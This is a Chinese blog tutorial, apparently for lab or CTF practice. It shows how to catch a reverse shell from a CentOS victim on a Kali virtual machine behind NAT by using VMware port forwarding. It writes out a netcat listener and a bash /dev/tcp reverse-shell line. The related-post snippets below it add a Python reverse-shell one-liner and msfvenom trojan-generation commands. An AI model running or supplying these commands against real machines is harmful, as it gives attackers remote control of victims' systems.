如何用内网虚拟机kali实现反弹shell

已于 2023-04-04 15:55:27 修改
阅读量9.8k 收藏 42
点赞数 7
文章标签: 网络安全 CTF 反弹shell
于 2020-05-23 23:44:07 首次发布
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/106307545
版权

注:前提是宿主机能被外网访问到(有个公网ip),原理是端口转发。或者用来反弹宿主机所在局域网的机器。所以最好还是买个有外网ip的服务器。

文章目录

这里我讲述的是NAT模式下的反弹shell,因为个人感觉NAT模式方便一点。

实验环境

  • 攻击机:kali虚拟机(位于内网)
    ip:192.168.77.128
    在这里插入图片描述

  • 宿主机:win10
    ip:10.8.163.224
    在这里插入图片描述

  • 受害端:centos-7

设置端口转发

虚拟机集群此时相当于在内网中,而要实现反弹shell,我们的受害端centos7必须要能够连接我们的虚拟机kali。可以通过端口转发的功能来实现,比如我把kali虚拟机的2333号端口映射到主机的6666号端口,这样外网其它机器只需访问宿主机的6666号端口即可连接宿主机的虚拟机了。

下面是设置步骤:

编辑→虚拟网络编辑器→NAT设置→添加

在这里插入图片描述在这里插入图片描述

反弹shell

然后把攻击机kali的端口监听打开

nc -lvp 2333

在这里插入图片描述

用受害机centos7生成一个反弹shell,连接宿主机的公网IP10.8.163.224/6666,这样通过端口转发,就会连接到kali虚拟机上。

bash -i >& /dev/tcp/10.8.163.224/6666 0>&1

在这里插入图片描述

我们可以看到kali已经获取到受害机的bash。
在这里插入图片描述

验证

我们用kali在受害机桌面上创建一个hello.txt看看shell生效没。

touch /root/桌面/hello.txt

在这里插入图片描述在这里插入图片描述

为什么要反弹shell?

反弹很好理解,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。通常用于被控端因防火墙受限、权限不足、端口被占用等情形。

什么情况下正向连接不能用?

有如下情况:

  • 某客户机中了你的网马,但是它在局域网内,你直接连接不了。

  • 目标机器的ip动态改变,你不能持续控制。

  • 防火墙等限制,对方机器只能发送请求,不能接收请求。

  • 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。

天问_Herbert555
关注
kali使用nc正向反弹windows shell
09-12 1470
3.kali主机运行终端 并输入 nc 192.168.31.201 8888 回车后,将反弹windows系统shellKali终端。2.查看windows系统IP并运行ncat监听8888端口。现在可通过这个shell对windows系统进行任何操作。1.下载 ncat.exe 并上传到windows。
内网kali 通过内网穿透反弹shell
失心少年
05-21 1329
通常我们kali都是安装在虚拟机上的,且在内网,但是通常在真实的渗透测试中,我们的kali需要有个公网ip来反弹shell,如何实现呢,接下来就给大家介绍一款我常用的工具。1、https://console.uulap.com/ 注册登录控制台。可以看到,shell已经成功反弹回来了。尝试通过nc 反弹获取shell。2、如图开通一个免费的隧道。看到下图,说明已经映射成功。3.在kali下载客户端。本地监听4444端口。
无需公网IP反弹shell
最新发布
qq_74263993的博客
08-22 199
Windows10(关掉病毒实时查杀,尽量别开防火墙)5.上传木门到Windows10并运行拿到shellkali机(网络畅通,具有ipv6地址)3.设置msfconsole,生成木马。2.查看自己的ipv6地址。1.启动kali提权。
kali /mac 成功的反弹shell语句
没有故事
04-21 1257
2: 这条命令使用,kali 上执行的命令结果会在mac机器上显示出来,mac无法执行命令,kali上执行命令无结果,结果在mac上显示。8: 这个命令,在攻击机上执行,如果有报错会显示在受害者机器上,,攻击机上不显示报错语句。13:这条命令是同步两边执行的命令,不会显示结果。3: 命令执行成功,能反弹成功,但是输入命令无显示,不会用。14: 这条命令在攻击机上报错也不会同步到受害者机器上。该语句在监听机器上执行的语句会同步到被攻击机上。攻击机执行 ncat -u -lvp 3333。
tty pty pts ptmx伪终端反弹shell
wang11876的博客
06-20 960
通过man pts可以查阅linux对伪终端的介绍。伪终端是伪终端master和伪终端slave(终端设备文件)这一对字符设备。/dev/ptmx是用于创建一对master、slave的文件。当一个进程打开它时,获得了一个master的文件描述符(file descriptor),同时在/dev/pts下创建了一个slave设备文件。master端是更接近用户显示器、键盘的一端,slave端是在虚拟终端上运行的CLI(Command Line Interface,命令行接口)程序。
后渗透——利用kali工具MSF反弹shell
爱国小白帽
03-16 5398
msfconsole可能是Metasploit框架(MSF)最流行的接口。它提供了一个“一体化”的集中控制台,并允许您高效地访问MSF中几乎所有可用的选项。MSFconsole一开始可能看起来有些吓人,但是一旦您了解了命令的语法,您就会了解利用这个接口的强大功能。 实验环境: Windows Server 2008 R2 x64 kali 模拟实验: 首先输入msfconsole打开软...
关于反弹shell的学习
weixin_74020633的博客
06-14 708
反弹Shell(也称为反向Shell)是一种技术,通常用于远程访问和控制目标计算机。反弹Shell的工作原理是,目标计算机主动发起连接到攻击者的计算机,从而绕过一些常见的安全措施,如防火墙和NAT(网络地址转换)。这种技术常用于合法的远程管理和测试环境中,但也可能被恶意攻击者利用进行未授权的远程控制。通俗一点讲就是当存在一台攻击机和一台被攻击机时,攻击机(也就是客户端)连接被攻击机(服务端)叫做正向连接,那么反弹shell就是反向的连接,客户端为被攻击机,服务端为攻击机,由被攻击机连接攻击机。
netcat使用及反弹shell
Bu2n的博客
02-20 5841
公网实现反弹shell
07-27
- *2* [如何用内网虚拟机kali实现反弹shell](https://blog.csdn.net/qq_44657899/article/details/106307545)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...
反弹Shell的基本操作
weixin_46831054的博客
11-26 1031
反弹shell定义: 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连
[ 隧道技术 ] 反弹shell的集中常见方式(四)python反弹shell
qq_51577576的博客
09-06 1367
python反弹shell python2 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.192.1',55555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4567
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
m0_47402792的博客
01-07 490
Windows10与虚拟机win7在vmnet1(仅主机模式下)使用nc进行反弹shell练习
kali下nc通信,文件传输,反弹shell
Deeeelete的博客
06-21 2930
kali1: 192.168.132.133 kali2: 192.168.132.144 一:使用nc通信 在kali1中使用nc -lnvp [端口号]来监听一个端口 在kali2中使用nc [kali1的ip] [端口]来链接对方监听的端口 然后可以在kali1中查看到链接机器 然后可以在kali2中直接输入内容然后回车,与此同时即可在kali1中接收到kali2的信息 二:使用nc传输文件 kali2向kali1传输一个img2.jpg文件 确保kali2下..
kali linux中meterpreter使用前的反弹shell及其基础语法
qq_42133828的博客
12-02 8107
一.反弹shell的类型: 1.reverse_tcp  (基于TCP反向链接反弹shell) 1).在kali linux终端中,生成一个反弹shell linux版: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=你kali本机的IP lport=随便选一个端口来接收信息 -f elf -o shell 如: msfveno...
【Try to Hack】无公网ip如何反弹shell
开心星人的博客
06-19 2025
内网kali端口监听 进行内网穿透,下载花生壳(免费的),需要注册才可以下载 https://www.oray.com/ 点击映射数,会跳转到浏览器 点击新增映射 内网主机为kali的IP 分配了域名和端口打开一个题目 传参 s546459d57.zicp.fun 23494为分配的域名和端口反弹shell...
渗透测试——利用公网反弹shell到本地的两种方式,vmware虚拟机与主机的端口转发,本地ssh无法上线的问题解决
SYH885的博客
07-24 1203
使用花生壳给定的端口对应至宿主机的1111端口并转发到虚拟机的1112端口,然后我们监听1112端口即可,测试是否可反弹shell。此时访问 x.x.x.x:7500 并使用自己设置的用户名密码登录,即可看到仪表板界面。成功转发并连接这里使用的是普通用户,因为不能连上超级用户,进去后su一下就好了。这边看见直接上线,分别是两台不同的主机的两台不同虚拟机的不同系统,试验成功。优势:长期使用,无需虚拟机转发,无需宿主机。这里都是192,是因为名字一样,但是IP电脑都不是一样。添加59955端口到策略才能成功。
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 499
知识是不断从学习中得到的,经验是从尝试中得到的!
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值